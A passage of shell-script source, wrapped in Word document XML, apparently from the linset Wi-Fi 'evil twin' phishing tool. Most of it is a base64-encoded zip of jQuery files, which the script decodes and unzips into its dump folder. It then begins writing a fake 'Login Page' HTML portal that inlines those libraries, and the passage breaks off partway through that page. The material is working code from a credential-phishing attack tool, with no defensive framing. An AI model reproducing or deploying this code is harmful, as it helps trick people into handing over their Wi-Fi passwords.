        <w:t>sXZEK8sPApHHKawYlhZXYLIj+CRRNL363Asex+5ZU6oRAvqPuCuLfFxWPRXTBNOhahxrIqIlLkOh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608A235" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>7/sf7es63M/8civfo+JBr7IH+wf7ByxM7RNF9s2E7VPX9n0frVXnlnnAFpITRSyFhFEKZ0L47ZLg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443B1D5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>4QhKnuuZqK81pQ3GTtUgNyMrHWaMTYNpmDVOlgNjv5KeyAZLyGSWjdJyTVKHEpsYOsZfYfW7cVX7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A0567" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>pXiB0yDx6KNBxYfdr509k9hDF+KBm83W7dS01MlhDe89HnLkdGWKCC6dA9uJVtGHtesrbW84xGpW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E3622" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>L+bwXCHrUzmrQVXn7IR6GIthioHfnueLd6t5T2XvYLOo8Ggke16F26qmQj2zVGWGZckJfxUNwV7F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF778A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>NqZflBWeduW/0Qe0nuzUB6qELoc0U3YzQvqP3JLKBS+uR3LA8ITvekO8SEZ2/VpQqvaW3KTuJ+dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C9C405" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>EwTd3m1FtdXKK2XfeHVYe4LlmHYfnnTUZRZnPUbXpD0ZB/yIlimTSqvFPOixZnRn8+CO2hH0fFJd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71DA51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>/8t0DG6uIeNLL0gXANp/h6ddPYz3Lh2C/xoVYJMG0JTsd9UJYg2Agdkx5Tflg0I0OKYEqf19wQPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD141D9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>rgrChyPcXiODC9GYXf+uwreZJXtsoq6u9sVy5rJRVQu0xdSI1JZTTvLDCbyZeCPogrJnIxL2OIMW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7F560" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>lkxc+dzbAZHKkXUQIyp7yPSpqJoCtwqhYdVJk5/EITUlySaHEHAtNsi1lVV7nRS/KotFvhhdsfMi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED5205" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>fsQipjUSXZSTJd3Bi2n6ylzm/+EPHPMcr/5DTIXAF89sKFBjGguLJlMXvqbJ72bOxIkvop6pTRCp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D706442" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>UUJ3cg54+RALKI8HmUrXWil9rd5U6Uoux9ba+MAUftDlGHkxQDLxEX/R2R41toopq9SUug80xSlq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2F4AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>YOct2qBjNZTALqALqVF08ejUu/NHSEp73Ws91aQbd2x1SyNqsNvtDNCgUuJfjj2WVQ0KC2x1oiso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713122E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>Mc8oD/LYJO/STAuo4XjI0pyRVM9Xl33c3cKMinyBAIyMe/njYxxjOa2ZgSGYDNr2LunwHXQ2wuif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514EF82" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>MEe718uOGAT+Hwjz/g/EcT+C5YzeLk1gfc6TdATdev3w8PM3bxEC/+2bj0F+f1dkz/NRBm/+/aiU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34FDCF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>76FpKh9ivXsMfY/3zmtzF5o555eA4+JACQDFWHPwN58Xy35208/W/eyXfpaXl0hyd6lFosQrWLQ+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF9AEC9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>cAc+oOMFunBZzvIJ3Ypik/AtvngPXHsEy0i2yhnduADV/7QAei3XtPluLJY4Njq44WW1brxY84tf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB344E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>Gi9+ER2Xjyj0C11gPiBDGYaonhGavSQNG6PCgcSYkd2anVRU/DFfwrT0shsg/xdo1erB//0CP/4r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376699A6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>Pl9nX2Z/xKe/0B/0BF/RXOInn1MIZhDlZDJ8m7uGIEO82bq3e9794l7yU5sx/EB9nTqJbCmKQYIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76213F55" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>0Yge+BL/2mEeuH1hMW+M5EXqidrezXes1TUrg7ZNv6NEewx+PK2wbPJTtxJ98DSxHOU4fTkH2hhP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74878B66" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>I1cIbIq9+1fLqQLC4J/OhkNnnjwvcocadV+YWCPRLvMpVv8yJDQCYJ+v4NwQXKAepVWeo+fNTLCW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFBBB13" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>8aJUU2IfmD2HIoPLzMHSjyjQ2MWmjimi3EI/6VqpSKGJ/RIQ0esQIcgvViAIVdU7zkOApL6krG9u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A44747C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>eJnAhCPqMiqEuInW+/Av45c7rICB8Ubw7ntm3TnZSNPuQGtjRn7uCKaS4F83CvTqA5TSZvtL1DP7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3595CE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>2aTICY6XukW3ZsWaxLjDR1mened1OYLJpl2FMBUFrqQRSsLo+IHOaNdlDeIrKAMjjGd0yONyASSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0FB18" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>zLz7PHgGKFPFY4fvELBXrBdEugXCnyNiiO4azG7o4M5J/KTAyXczzNOE1J6UmEqNOnCVgxoNCxiO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D99D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>k7XcsTFhYGIu0fZDV5yYvAJmYokyBIEtS8aTRXG5mmDm1+VyTnOJSXkUjpqkazgxe19//Xk/+x4I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3A9F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>kmfPYVIO1ELkwq+h7yY3ZRYcOnZg/pyR4T8ej2WF9d3qn1SwhbpmVaqGRhBZo2eTjizo0Boi665t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B5E7E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>XXtxAFHMsR+Tc+jxAM+AfLbm8/2ygmauF4jp3/u3lxlMTYUeAsVydECX/ZL6YVzhmsIcfLw4iIFo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4B661" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>KicGxNb8OLyJCUAbd99YInM/h/2B67QmGURB3qMkCXgaMghWJwgYaO7zfvb58fExD9OD2ukUMLAd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C58054" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>9PNC89vJinVBze5eeSwpO03qW8Gq9mwHY3VlrkDPf0HQdrFfjDamfIsa6ewphhMiIWbGoWh5ZYBV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8FAB1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>RXFJA+T1s+jxGLpRXXrkvD3aEKfUyKAGljL/Nkc/HP+buP6LfJFP6x49JaXgu2qU8wgQGuHqwFYn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1652E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>GeLd2Qjq2zPWM79enwGhqUl/0w2bY1YJXZG9XGCugb4qdy5FDjoB7iPlER0VF7Szu99jOsSZLwPq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2676883D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>4NeK+Mm4f/GdjLl/M5czSEUPNxZa1kOnH8SnY+riKtXbldViQhnIaDaln5H7inRXUHbLQBEVFQr9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C55415C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>AWag1NYiXC3zDCumBANApvGaGsT/z4h8vFCXV7NcDPVCJ7LoeX0V6ghwLPi9KHhthMGP+llQ1F1L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB93EE9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>TmRVDLRx+MA9qwvUrKJIeLcKWGYw+4YzIkyzUV7zKkD+U2tyRaIDptYkRr6oqmXWQ8uJ5C4ItyCx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF5E57" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>iSX6BGKiOJVO4EhTtnYQiF30oSximTJ61Gv0lip3mR+CSvDVE31jt6+r3QOPpDjzoSZ06dqt4viI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C30673" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>akXIcoTNzlD4Yn5ppBDYbJxcYFGMXR7RZr/R8SxH6QNT39LOGxOxvDiCcTNLle8n5TnoyWtegcVi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DB3142" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>qSD9OeZJHC0DSkBPaY0+RRcd6AW6RWNqk8DlDOqw1y9XkqaVXE0cFV0PxwWMckqziKcwyrbA26Uy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FD95C2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>6IhQRCQkFhHKpZEsjfAUNCH+LIbko5WQC89ZPKKmsA0l8twNEUVLnNLvuMzz+tIP7jcJq5yMPpZS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666F2B7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>LetEZiqXWEw/yUAh+s4Y5XUgARkWmfOOi2KO4DB9pReaz/BFycbH97DAxllPaFJzkmqYEVbwPsKD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A3C01" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fVxJMhM2yBB//sihWiy4Sa6PiSfCH4lmCOSuGZzjw1IP1qffP5fafoCDY3peLPogQF+jRa/vVwf1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5CF749" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GlFKKc3KOWJlIOO5508GK3Zh6e+URCpi/eEPfFbYw3VQ1ngI/hXp0PP8i48t/YJMYu6044TO++Fh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B878E59" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>2+UcOPvEG4XDRu28gH/0QHSF+Eg+NTyDzxXs1J+LtVN79Whg7zjO7M2LDMNZyhl127P/O4zRnwj6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CDC93" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DXD9b1lqHkgjT2u0T+AHsKEpGRUhRtm4uFvXxWn+DjWOBU05nVPS03k1VzgR/C/nyCtuMDWUfqs2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56D123" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ZcPxziUHsR0zrzPMByoetpO1M3eCkPeeYmzmxQjKDqSqAmdgVV+9xLZlRfRSo3flvS2q/vvKC0oN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A20E79" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>kQi0gYgIri5e+rhqeolDoe8CU5xIOcy6M8yOKBZWMWv7ZAbwP64TJ9ShrrCJdVFN8ekTes+fcKcS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211FADE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>N65GizVMpVoo4XnuaNicVhPY5kIweTn3jlaj+hWQfMFptNGKKPNESwyp5mbn3odOT4OX+37DOnyN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1F85A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>o33jpiGIKEblBj2kSBHnjM18d5DV5RS448WaBbByhqZothc4BdaNxA7T1Su8SbI0/Vwf6WjcH4Of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20318F81" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>67b1JVUOOMv2afb6zUlL0eZ+Zl4Sb+WvoidD8ztYpXuBgwXfrxDiEHt1O+xFPB9WlNJ6BQfZOZso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285B168A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>MJe5z8IFZHzoY9nhiMsx7+WUpADRAIuZq10zstPneHMEB8fAAUpThiTMmATnzPFgMGDTQp09pIrg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C7B55" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DCr0PKDp4pmRuq5J8cQTlFoQozbmZgM9Fk3VP69qn9mc+jNAY0skm6cwJh96qyiZVAjc7ttqWnAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4794457E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>Q1zl2DZJK8jv1mhRkTzpnpQljYMqWRqKPsRjcFpB3yTTk6Q41mxHS5RS4FMUYY+znslTj0PE8R10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3AD5E8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>lHWWcq34sE+57Y8z5AkoK2Z0NvgjpjGEUzbMKBiA7zUI+huSUNLJ9ZBW3jGstodCJpj/Q1ZVcJKc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522CE4AB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>UdjbPVbL6ixQk3Wje7Np8DqMNBKDIRlDiJl0hBPB3NP9haTMGl0tEOu+mlHRjmci+NN0p4b/zJZC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4D6797" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>CeM1di9AR3hREYPQgCWnzJ89Iw7JNiA2f6i57cnLl3Do0WeHhcS0InvnVXxN24lMNyy/Yd7rd4fn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BBBCE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ec3y+LKaSYo43HGaFw4WL7otqMi37zHS0SNlkP1I9qs8+7f8fQ5DKudLk55V1j8GrAiRNO82Wrnq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B0D7A1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>4dHRJTC+1flgVE2Pfv47WgPkH9FUjjhN39Gnn3/+xzAXdepOfmA6isLCewo3k8MtiW3XBiEJLzAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D16D4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>55nymRdw6ueXcgQbrmbt2EkzducW/vlfUEsBAh4DFAAAAAgARnzORIn0cA+OggAAxG0BABMAGAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D718699" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>AAAAAQAAAKSBAAAAAGpxdWVyeS0xLjguMy5taW4uanNVVAUAA1RPnFN1eAsAAQQAAAAABAAAAABQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374595A4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>SwECHgMUAAAACAC3e85EqOffJSZMAADtFAIAFwAYAAAAAAABAAAApIHbggAAanF1ZXJ5Lm1vYmls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A8A60" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ZS0xLjMuMi5jc3NVVAUAA0lOnFN1eAsAAQQAAAAABAAAAABQSwECHgMUAAAACAB1fM5EEp6tqmiH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB3786" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>AQBregUAFgAYAAAAAAABAAAApIFSzwAAanF1ZXJ5Lm1vYmlsZS0xLjMuMi5qc1VUBQADrk+cU3V4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE07C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>CwABBAAAAAAEAAAAAFBLBQYAAAAAAwADABIBAAAKVwIAAAA=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3DB0D0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>" | base64 -d &gt;$DUMP_PATH/file.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B51312" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A98EE1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>unzip $DUMP_PATH/file.zip -d $DUMP_PATH/data &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB1272" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>rm $DUMP_PATH/file.zip &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F8EE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FA3EE9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C4863" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381CC57" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0588FF4C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;title&gt;Login&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6CA57" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D739A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;style&gt;$(cat $DUMP_PATH/data/jquery.mobile-1.3.2.css)&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C8A87F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;script&gt;$(cat $DUMP_PATH/data/jquery-1.8.3.min.js)&lt;/script&gt;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF4E9E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;script&gt;$(cat $DUMP_PATH/data/jquery.mobile-1.3.2.js)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE0DA0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211D6A46" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>.ui-btn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082CD49" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    width: 20% !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A126E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71E68B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A64D01" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5141A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F410322" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;div data-role=\"page\" id=\"login\" data-theme=\"b\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C221972" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"header\" data-theme=\"a\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43373269" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;h3&gt;Login Page&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795B3B2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051B8D6F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D7FAB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div data-role=\"content\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E77A44" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A76EB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"$DIALOG_WEB_OK"</w:t>
      </w:r>
    </w:p>
